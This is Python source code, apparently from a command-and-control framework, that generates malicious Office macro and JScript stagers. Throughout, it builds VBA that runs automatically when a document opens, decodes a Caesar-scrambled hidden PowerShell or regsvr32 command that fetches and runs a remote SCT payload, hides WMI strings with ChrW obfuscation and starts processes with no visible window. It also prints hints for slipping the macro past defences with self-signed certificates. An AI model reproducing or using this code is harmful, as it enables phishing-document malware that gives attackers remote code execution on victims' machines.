def macro(cls, stagerParameters):
"""Creates an Office VBA macro that launches a powershell one liner command"""
command = "powershell -NoP -sta -NonI -W Hidden -Enc "
# Scramble the oneliner with a dumb caesar cipher :-) Simple obfuscation will do
key = helpers.randomInt(
0, 94
) # 94 is the range of printable ASCII chars (between 32 and 126)
encryptedCommand = ""
for char in command:
num = ord(
char
) - 32 # Translate the working space, 32 being the first printable ASCI char
shifted = (num + key) % 94 + 32
if shifted == 34:
encryptedCommand += "\"{}".format(chr(
shifted)) # Handling the double quote print problem in VBA
else:
encryptedCommand += chr(shifted)
# Randomize VBA variable names
varTmp = helpers.randomString(5)
varEncryptedCommand = helpers.randomString(5)
varEncodedCommand = helpers.randomString(5)
varFinalCommand = helpers.randomString(5)
varFlag = helpers.randomString(5)
varKey = helpers.randomString(5)
varObjWMI = helpers.randomString(5)
varObjStartup = helpers.randomString(5)
varObjConfig = helpers.randomString(5)
varObjProcess = helpers.randomString(5)
parameters = {'varTmp':varTmp,'varEncryptedCommand':varEncryptedCommand,'encryptedCommand':encryptedCommand,\
'varEncodedCommand':varEncodedCommand,'varFinalCommand':varFinalCommand,'varFlag':varFlag,\
'varKey':varKey,'key':key,'varObjWMI':varObjWMI,'varObjStartup':varObjStartup,'varObjConfig':varObjConfig,\
'varObjProcess':varObjProcess,'serverName':stagerParameters['serverName']}
macro = helpers.convertFromTemplate(parameters, 'templates/macro.tpl')
try:
with open('stagers/macro.vb', 'w+') as f:
f.write(macro)
f.close()
print helpers.color(
"[+] Macro stager saved in [stagers/macro.vb]")
print helpers.color(
"[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'"
)
except IOError:
print helpers.color(
"[!] Could not write stager file [stagers/macro.vb]")
def jscript(cls, stagerParameters):
"""Creates an JScript script that launchs a serialized version of the agent, thx to DotNetToJscript method"""
# Randomize JS variable names
varTmp = helpers.randomString(5)
varEncodedCommand = helpers.randomString(5)
varFinalCommand = helpers.randomString(5)
varFlag = helpers.randomString(5)
varExec = helpers.randomString(5)
caesarKey = helpers.randomInt(0, 94)
varWebDavServer = helpers.randomString(4)
webDavServer = cls.caesar('js', caesarKey,
stagerParameters['serverName'])
funcInvertCaesar = helpers.randomString(10)
varEntryClass = helpers.randomString(4)
entryClass = cls.caesar('js', caesarKey, "C2_Agent")
memoryStream = cls.caesar('js', caesarKey, "System.IO.MemoryStream")
binaryFormatter = cls.caesar(
'js', caesarKey,
"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
arrayList = cls.caesar('js', caesarKey, "System.Collections.ArrayList")
parameters = { 'caesarKey' : caesarKey, 'varWebDavServer': varWebDavServer, 'webDavServer': webDavServer, \
'funcInvertCaesar': funcInvertCaesar, 'varEntryClass': varEntryClass, 'entryClass': entryClass, \
'memoryStream': memoryStream, 'binaryFormatter': binaryFormatter, 'arrayList': arrayList \
}
macro = helpers.convertFromTemplate(parameters,
'templates/jscript.tpl')
try:
with open('stagers/agent.js', 'w+') as f:
f.write(macro)
f.close()
print helpers.color(
"[+] Macro stager saved in [stagers/agent.js]")
except IOError:
print helpers.color(
"[!] Could not write stager file [stagers/agent.js]")
def macro(cls, stagerParameters):
"""Creates an Office VBA macro that launches a powershell one liner command"""
# First generate the powershell one liner
oneLiner = cls.oneLiner(stagerParameters)
# Scramble the oneliner with a dumb caesar cipher :-) Simple obfuscation will do
key = helpers.randomInt(
0, 94
) # 94 is the range of printable ASCII chars (between 32 and 126)
scrambledOneliner = ""
for char in oneLiner:
num = ord(
char
) - 32 # Translate the working space, 32 being the first printable ASCI char
shifted = (num + key) % 94 + 32
if shifted == 34:
scrambledOneliner += "\"{}".format(chr(
shifted)) # Handling the double quote print problem in VBA
else:
scrambledOneliner += chr(shifted)
# Split this scrambled oneliner is 50 chars long chunk of strings
chunks = list(helpers.chunks(scrambledOneliner, 50))
# This is the actual VBA code to launch powershell using WMI services
# Variable's names are randomized
varKey = helpers.randomString(5)
varStr = helpers.randomString(5)
varObjWMI = helpers.randomString(5)
varObjStartup = helpers.randomString(5)
varObjConfig = helpers.randomString(5)
varObjProcess = helpers.randomString(5)
payload = "\tDim {} As String\n".format(varStr)
payload += "\t{} = \"".format(varStr) + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t{} = {} + \"".format(varStr,
varStr) + str(chunk) + "\"\n"
# Auto opening functions for both Word and Excel
macro = "Sub Auto_Open()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro = "Sub AutoOpen()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro += "Sub Workbook_Open()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro += "Public Function ComputeTable() As Variant\n"
macro += "\tDim {} As Integer\n".format(varKey)
macro += "\t{} = {}\n".format(varKey, key)
macro += payload
# Payload decryption stub = inverse caesar
macro += "\tDim i, n, s As Integer\n"
macro += "\tFor i = 1 To Len({})\n".format(varStr)
macro += "\t\tn = Asc(Mid({}, i, 1))\n".format(varStr)
macro += "\t\ts = n - {}\n".format(varKey)
macro += "\t\tIf s < 32 Then\n"
macro += "\t\t\ts = s + 94\n"
macro += "\t\tEnd If\n"
macro += "\t\tMid({}, i, 1) = Chr(s)\n".format(varStr)
macro += "\tNext\n"
# WMI Process instantiation stub
#macro += "\tSet {} = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n".format(varObjWMI)
# Somehow hidden like this:
macro += "\tSet {} = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _\n".format(
varObjWMI)
macro += "\t\t& ChrW(58) & ChrW(92) & ChrW(92) & ChrW(46) & ChrW(92) & ChrW(114) & ChrW(111) & ChrW(111) & ChrW(116) & ChrW(92) _\n"
macro += "\t\t& ChrW(99) & ChrW(105) & ChrW(109) & ChrW(118) & ChrW(50))\n"
#macro += "\tSet {} = {}.Get(\"Win32_ProcessStartup\")\n".format(varObjStartup, varObjWMI)
# Somehow hidden like this:
macro += "\tSet {} = {}.Get(ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) & ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) & ChrW(111) _\n".format(
varObjStartup, varObjWMI)
macro += "\t\t& ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(83) & ChrW(116) & ChrW(97) & ChrW(114) & ChrW(116) _\n"
macro += "\t\t& ChrW(117) & ChrW(112))\n"
macro += "\tSet {} = {}.SpawnInstance_\n".format(
varObjConfig, varObjStartup)
macro += "\t{}.ShowWindow = 0\n".format(varObjConfig)
#macro += "\tSet {} = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n".format(varObjProcess)
# Somehow hidden like this:
macro += "\tSet {} = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _\n".format(
varObjProcess)
macro += "\t\t& ChrW(58) & ChrW(92) & ChrW(92) & ChrW(46) & ChrW(92) & ChrW(114) & ChrW(111) & ChrW(111) & ChrW(116) & ChrW(92) _\n"
macro += "\t\t& ChrW(99) & ChrW(105) & ChrW(109) & ChrW(118) & ChrW(50) & ChrW(58) & ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) _\n"
macro += "\t\t& ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115))\n"
macro += "\t{}.Create {}, Null, {}, intProcessID\n".format(
varObjProcess, varStr, varObjConfig)
macro += "End Function\n"
try:
with open(cfg.defaultPath['macroStager'], "w+") as f:
f.write(macro)
f.close()
print helpers.color("[+] Macro stager saved in [{}]".format(
cfg.defaultPath['macroStager']))
print helpers.color(
"[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'"
)
except IOError:
print helpers.color("[!] Could not write stager file [{}]".format(
cfg.defaultPath['macroStager']))
def macro_sct(cls, sctUrl):
"""Creates an Office VBA macro that uses the regsvr32.exe JScript code execution trick from @subTee to load an SCT file stager"""
# The shell command to be executed. It spawns a regsvr32.exe process to download the SCT stager from a URL and executed it
shellCommand = "regsvr32.exe /s /n /u /i:" + sctUrl + " scrobj.dll"
# Scramble the shell command with a dumb caesar cipher :-) Simple obfuscation will do
key = helpers.randomInt(
0, 94
) # 94 is the range of printable ASCII chars (between 32 and 126)
scrambledShellCommand = ""
for char in shellCommand:
num = ord(
char
) - 32 # Translate the working space, 32 being the first printable ASCI char
shifted = (num + key) % 94 + 32
if shifted == 34:
scrambledShellCommand += "\"{}".format(chr(
shifted)) # Handling the double quote print problem in VBA
else:
scrambledShellCommand += chr(shifted)
# Variable's names are randomized
varStr = helpers.randomString(5)
varKey = helpers.randomString(5)
# Auto opening functions for both Word and Excel
macro = "Sub Auto_Open()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro = "Sub AutoOpen()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro += "Sub Workbook_Open()\n"
macro += "\tComputeTable\n"
macro += "End Sub\n\n"
macro += "Public Function ComputeTable() As Variant\n"
macro += "\tDim {} As String\n".format(varStr)
macro += "\t{} = \"{}\"\n".format(varStr, scrambledShellCommand)
macro += "\tDim {} As Integer\n".format(varKey)
macro += "\t{} = {}\n".format(varKey, key)
# scrambled shell Command decryption stub = inverse caesar
macro += "\tDim i, n, s As Integer\n"
macro += "\tFor i = 1 To Len({})\n".format(varStr)
macro += "\t\tn = Asc(Mid({}, i, 1))\n".format(varStr)
macro += "\t\ts = n - {}\n".format(varKey)
macro += "\t\tIf s < 32 Then\n"
macro += "\t\t\ts = s + 94\n"
macro += "\t\tEnd If\n"
macro += "\t\tMid({}, i, 1) = Chr(s)\n".format(varStr)
macro += "\tNext\n"
macro += "\tresult = Shell({}, 0)\n".format(varStr)
macro += "End Function\n"
try:
with open(cfg.defaultPath['macroStager'], "w+") as f:
f.write(macro)
f.close()
print helpers.color("[+] Macro stager saved in [{}]".format(
cfg.defaultPath['macroStager']))
print helpers.color(
"[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'"
)
except IOError:
print helpers.color("[!] Could not write stager file [{}]".format(
cfg.defaultPath['macroStager']))